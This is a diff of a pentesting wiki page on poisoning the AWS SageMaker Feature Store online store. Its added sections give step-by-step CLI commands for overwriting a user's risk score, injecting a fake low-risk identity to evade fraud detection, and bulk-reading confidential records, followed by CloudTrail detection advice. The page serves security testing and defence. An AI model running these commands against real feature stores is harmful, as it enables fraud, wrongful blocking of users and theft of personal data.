|
1 | 1 | # SageMaker Feature Store online store poisoning |
2 | 2 |
|
3 | | -Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints. |
| 3 | +Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features and exfiltrate confidential ML data. This does not require access to models or endpoints, making it a direct data-layer attack. |
4 | 4 |
|
5 | 5 | ## Requirements |
6 | 6 | - Permissions: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord` |
7 | 7 | - Target: Feature Group with OnlineStore enabled (typically backing real-time inference) |
| 8 | +- Complexity: **LOW** - Simple AWS CLI commands, no model manipulation required |
8 | 9 |
|
9 | 10 | ## Steps |
10 | | -1) Pick or create a small Online Feature Group for testing |
| 11 | + |
| 12 | +### Reconnaissance |
| 13 | + |
| 14 | +1) List Feature Groups with OnlineStore enabled |
| 15 | +```bash |
| 16 | +REGION=${REGION:-us-east-1} |
| 17 | +aws sagemaker list-feature-groups \ |
| 18 | + --region $REGION \ |
| 19 | + --query "FeatureGroupSummaries[?OnlineStoreConfig!=null].[FeatureGroupName,CreationTime]" \ |
| 20 | + --output table |
| 21 | +``` |
| 22 | + |
| 23 | +2) Describe a target Feature Group to understand its schema |
| 24 | +```bash |
| 25 | +FG=<feature-group-name> |
| 26 | +aws sagemaker describe-feature-group \ |
| 27 | + --region $REGION \ |
| 28 | + --feature-group-name "$FG" |
| 29 | +``` |
| 30 | + |
| 31 | +Note the `RecordIdentifierFeatureName`, `EventTimeFeatureName`, and all feature definitions. These are required for crafting valid records. |
| 32 | + |
| 33 | +### Attack Scenario 1: Data Poisoning (Overwrite Existing Records) |
| 34 | + |
| 35 | +1) Read the current legitimate record |
| 36 | +```bash |
| 37 | +aws sagemaker-featurestore-runtime get-record \ |
| 38 | + --region $REGION \ |
| 39 | + --feature-group-name "$FG" \ |
| 40 | + --record-identifier-value-as-string user-001 |
| 41 | +``` |
| 42 | + |
| 43 | +2) Poison the record with malicious values using inline `--record` parameter |
| 44 | +```bash |
| 45 | +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) |
| 46 | + |
| 47 | +# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user |
| 48 | +aws sagemaker-featurestore-runtime put-record \ |
| 49 | + --region $REGION \ |
| 50 | + --feature-group-name "$FG" \ |
| 51 | + --record "[ |
| 52 | + {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"}, |
| 53 | + {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"}, |
| 54 | + {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"}, |
| 55 | + {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"}, |
| 56 | + {\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"} |
| 57 | + ]" \ |
| 58 | + --target-stores OnlineStore |
| 59 | +``` |
| 60 | + |
| 61 | +3) Verify the poisoned data |
| 62 | +```bash |
| 63 | +aws sagemaker-featurestore-runtime get-record \ |
| 64 | + --region $REGION \ |
| 65 | + --feature-group-name "$FG" \ |
| 66 | + --record-identifier-value-as-string user-001 |
| 67 | +``` |
| 68 | + |
| 69 | +**Impact**: ML models consuming this feature will now see `risk_score=0.99` for a legitimate user, potentially blocking their transactions or services. |
| 70 | + |
| 71 | +### Attack Scenario 2: Malicious Data Injection (Create Fraudulent Records) |
| 72 | + |
| 73 | +Inject completely new records with manipulated features to evade security controls: |
| 74 | + |
| 75 | +```bash |
| 76 | +NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) |
| 77 | + |
| 78 | +# Create fake user with artificially low risk to perform fraudulent transactions |
| 79 | +aws sagemaker-featurestore-runtime put-record \ |
| 80 | + --region $REGION \ |
| 81 | + --feature-group-name "$FG" \ |
| 82 | + --record "[ |
| 83 | + {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"}, |
| 84 | + {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"}, |
| 85 | + {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"}, |
| 86 | + {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"}, |
| 87 | + {\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"} |
| 88 | + ]" \ |
| 89 | + --target-stores OnlineStore |
| 90 | +``` |
| 91 | + |
| 92 | +Verify the injection: |
| 93 | +```bash |
| 94 | +aws sagemaker-featurestore-runtime get-record \ |
| 95 | + --region $REGION \ |
| 96 | + --feature-group-name "$FG" \ |
| 97 | + --record-identifier-value-as-string user-999 |
| 98 | +``` |
| 99 | + |
| 100 | +**Impact**: Attacker creates a fake identity with low risk score (0.01) that can perform high-value fraudulent transactions without triggering fraud detection. |
| 101 | + |
| 102 | +### Attack Scenario 3: Sensitive Data Exfiltration |
| 103 | + |
| 104 | +Read multiple records to extract confidential features and profile model behavior: |
| 105 | + |
| 106 | +```bash |
| 107 | +# Exfiltrate data for known users |
| 108 | +for USER_ID in user-001 user-002 user-003 user-999; do |
| 109 | + echo "Exfiltrating data for ${USER_ID}:" |
| 110 | + aws sagemaker-featurestore-runtime get-record \ |
| 111 | + --region $REGION \ |
| 112 | + --feature-group-name "$FG" \ |
| 113 | + --record-identifier-value-as-string ${USER_ID} |
| 114 | +done |
| 115 | +``` |
| 116 | + |
| 117 | +**Impact**: Confidential features (risk scores, transaction patterns, personal data) exposed to attacker. |
| 118 | + |
| 119 | +### Testing/Demo Feature Group Creation (Optional) |
| 120 | + |
| 121 | +If you need to create a test Feature Group: |
| 122 | + |
11 | 123 | ```bash |
12 | 124 | REGION=${REGION:-us-east-1} |
13 | 125 | FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text) |
14 | 126 | if [ -z "$FG" -o "$FG" = "None" ]; then |
15 | 127 | ACC=$(aws sts get-caller-identity --query Account --output text) |
16 | | - FG=ht-fg-$ACC-$(date +%s) |
| 128 | + FG=test-fg-$ACC-$(date +%s) |
17 | 129 | ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole) |
18 | | - aws sagemaker create-feature-group --region $REGION --feature-group-name "$FG" --record-identifier-feature-name entity_id --event-time-feature-name event_time --feature-definitions "[{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}]" --online-store-config "{\"EnableOnlineStore\":true}" --role-arn "$ROLE_ARN" |
| 130 | + |
| 131 | + aws sagemaker create-feature-group \ |
| 132 | + --region $REGION \ |
| 133 | + --feature-group-name "$FG" \ |
| 134 | + --record-identifier-feature-name entity_id \ |
| 135 | + --event-time-feature-name event_time \ |
| 136 | + --feature-definitions "[ |
| 137 | + {\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"}, |
| 138 | + {\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"}, |
| 139 | + {\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}, |
| 140 | + {\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"}, |
| 141 | + {\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"} |
| 142 | + ]" \ |
| 143 | + --online-store-config "{\"EnableOnlineStore\":true}" \ |
| 144 | + --role-arn "$ROLE_ARN" |
| 145 | + |
19 | 146 | echo "Waiting for feature group to be in Created state..." |
20 | 147 | for i in $(seq 1 40); do |
21 | 148 | ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true) |
22 | | - echo $ST; [ "$ST" = "Created" ] && break; sleep 15 |
| 149 | + echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15 |
23 | 150 | done |
24 | 151 | fi |
25 | | -``` |
26 | 152 |
|
27 | | -2) Insert/overwrite an online record (poison) |
28 | | -```bash |
29 | | -NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ) |
30 | | -cat > /tmp/put.json << JSON |
31 | | -{ |
32 | | - "FeatureGroupName": "$FG", |
33 | | - "Record": [ |
34 | | - {"FeatureName": "entity_id", "ValueAsString": "user-123"}, |
35 | | - {"FeatureName": "event_time", "ValueAsString": "$NOW"}, |
36 | | - {"FeatureName": "risk_score", "ValueAsString": "0.99"} |
37 | | - ], |
38 | | - "TargetStores": ["OnlineStore"] |
39 | | -} |
40 | | -JSON |
41 | | -aws sagemaker-featurestore-runtime put-record --region $REGION --cli-input-json file:///tmp/put.json |
| 153 | +echo "Feature Group ready: $FG" |
42 | 154 | ``` |
43 | 155 |
|
44 | | -3) Read back the record to confirm manipulation |
45 | | -```bash |
46 | | -aws sagemaker-featurestore-runtime get-record --region $REGION --feature-group-name "$FG" --record-identifier-value-as-string user-123 --feature-name risk_score --query "Record[0].ValueAsString" |
47 | | -``` |
48 | 156 |
|
49 | | -Expected: risk_score returns 0.99 (attacker-set), proving ability to change online features consumed by models. |
| 157 | +## Detection |
| 158 | + |
| 159 | +Monitor CloudTrail for suspicious patterns: |
| 160 | +- `PutRecord` events from unusual IAM principals or IP addresses |
| 161 | +- High frequency `PutRecord` or `GetRecord` calls |
| 162 | +- `PutRecord` with anomalous feature values (e.g., risk_score outside normal range) |
| 163 | +- Bulk `GetRecord` operations indicating mass exfiltration |
| 164 | +- Access outside normal business hours or from unexpected locations |
| 165 | + |
| 166 | +Implement anomaly detection: |
| 167 | +- Feature value validation (e.g., risk_score must be 0.0-1.0) |
| 168 | +- Write pattern analysis (frequency, timing, source identity) |
| 169 | +- Data drift detection (sudden changes in feature distributions) |
50 | 170 |
|
51 | | -## Impact |
52 | | -- Real-time integrity attack: manipulate features used by production models without touching endpoints/models. |
53 | | -- Confidentiality risk: read sensitive features via GetRecord from OnlineStore. |
| 171 | +## References |
| 172 | +- [AWS SageMaker Feature Store Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store.html) |
| 173 | +- [Feature Store Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-security.html) |
0 commit comments